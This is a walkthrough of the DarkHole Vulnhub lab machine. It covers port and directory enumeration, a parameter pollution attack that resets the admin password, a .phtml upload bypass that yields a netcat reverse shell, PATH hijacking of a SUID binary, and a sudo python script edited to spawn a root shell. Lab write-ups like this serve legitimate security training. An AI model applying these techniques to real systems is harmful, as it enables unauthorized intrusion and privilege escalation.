DarkHole Vulnhub Walkthrough
Creator: Je_1r.
Download Link : https://www.vulnhub.com/entry/darkhole-1,724/
Enumeration
I started the enumeration with nmap scan to look for open ports and running services. You can also use rustscan for faster results using the command shown below.
nmap -p- 192.168.29.246 -Pn
.
.
.
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
running nmap scripts to check for version of services and other useful information.
nmap -sC -sV -Pn -p22,80 192.168.29.246 -oN nmap.txt
.
.
.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e4:50:d9:50:5d:91:30:50:e9:b5:7d:ca:b0:51:db:74 (RSA)
| 256 73:0c:76:86:60:63:06:00:21:c2:36:20:3b:99:c1:f7 (ECDSA)
|_ 256 54:53:4c:3f:4f:3a:26:f6:02:aa:9a:24:ea:1b:92:8c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I first enumerated apache httpd server on port 80, but there was nothing useful on the main page. Next I used ffuf for directory brute-force attack using the command shown below:
ffuf -c -u "http://192.168.29.246/FUZZ" -e .php,.txt,.html,.bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404
.
.
.
index.php [Status: 200, Size: 810, Words: 347, Lines: 29]
login.php [Status: 200, Size: 2507, Words: 422, Lines: 50]
register.php [Status: 200, Size: 2886, Words: 512, Lines: 56]
upload [Status: 301, Size: 317, Words: 20, Lines: 10]
css [Status: 301, Size: 314, Words: 20, Lines: 10]
js [Status: 301, Size: 313, Words: 20, Lines: 10]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
config [Status: 301, Size: 317, Words: 20, Lines: 10]
dashboard.php [Status: 200, Size: 21, Words: 4, Lines: 1]I found nothing useful in directories but login.php and register.php seemed to be interesting where I tested for SQL injection to bypass login form but the sql injection payloads didn't work.
After successful registration, I logged in and found a web page where users can update their information.
The get parameter id looked suspicious to me, so I decided to capture the request and play with this parameter in burpsuite (a more handy way). I first tested for IDOR but it did not work.
Next I intercepted the request while changing the password.
Now this time I tested for a parameter pollution attack and the response to this was "200 OK", which means the password changed successfully but for which user ? User with id 1 or with id 2?
I tried to login using my old password and I was able to log in. This means that the password was changed for the user with id 1 (maybe admin is the username).
I tried logging in as user admin with the password I updated and we were in!
File Upload Bypass
Now we have access to the admin panel and we have upload functionality. So I tried uploading a file with .php extension but only .png, .jpg and .gif files were allowed.
To bypass this server side check I simply renamed the shell.php script to shell.phtml and tried to upload the file again.
The file was uploaded successfully and was moved to /upload/ directory. I started a netcat listener on the specified port in my machine and got a reverse shell.
❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.29.116] from (UNKNOWN) [192.168.29.246] 33038
Linux darkhole 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
18:06:30 up 39 min, 0 users, load average: 0.04, 0.06, 0.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$User Shell
I started enumerating the box and found an interesting SUID binary using the command shown below:
find / -perm -u=s -type f 2>/dev/nullAfter running the toto binary, I found that it is running the id command in the background by setting up the uid and gid for user john. To confirm this, I ran the strings command on the toto binary.
www-data@darkhole:/home/john$ ./toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
www-data@darkhole:/home/john$ strings toto | head
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__Next I opened this binary in ghidra and after analyzing I found that it is vulnerable to misconfigured path.
We can take advantage of this by creating our own evil version of id to get a shell as user john.
www-data@darkhole:/tmp$ cat id
**#!/bin/bash
bash**
www-data@darkhole:/tmp$ chmod 777 id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
www-data@darkhole:/tmp$ /home/john/toto
john@darkhole:/tmp$ whoami
johnRoot Shell
Getting a root was very simple. In john's home directory, I found a password file which contains the password of user john.
Next I ran sudo -l to check for sudo permissions and found this:
john@darkhole:/home/john$ cat password
ro******
john@darkhole:/home/john$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on darkhole:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on darkhole:
(root) /usr/bin/python3 /home/john/file.pyUser john we can edit file.py, so by using os module in python I added the code to pop a shell as user root!
john@darkhole:/home/john$ cat file.py
**import os
os.system("/bin/bash")**
john@darkhole:/home/john$ sudo -u root /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# cd /root
root@darkhole:~# cat root.txt
DarkHole{You_Are_Legend}We are now root and also we have completed this challenge! For any queries you can PM me on discord - golith3r00t#1859.
NOTE: The awesome artwork used in this article was created by Alex Pista.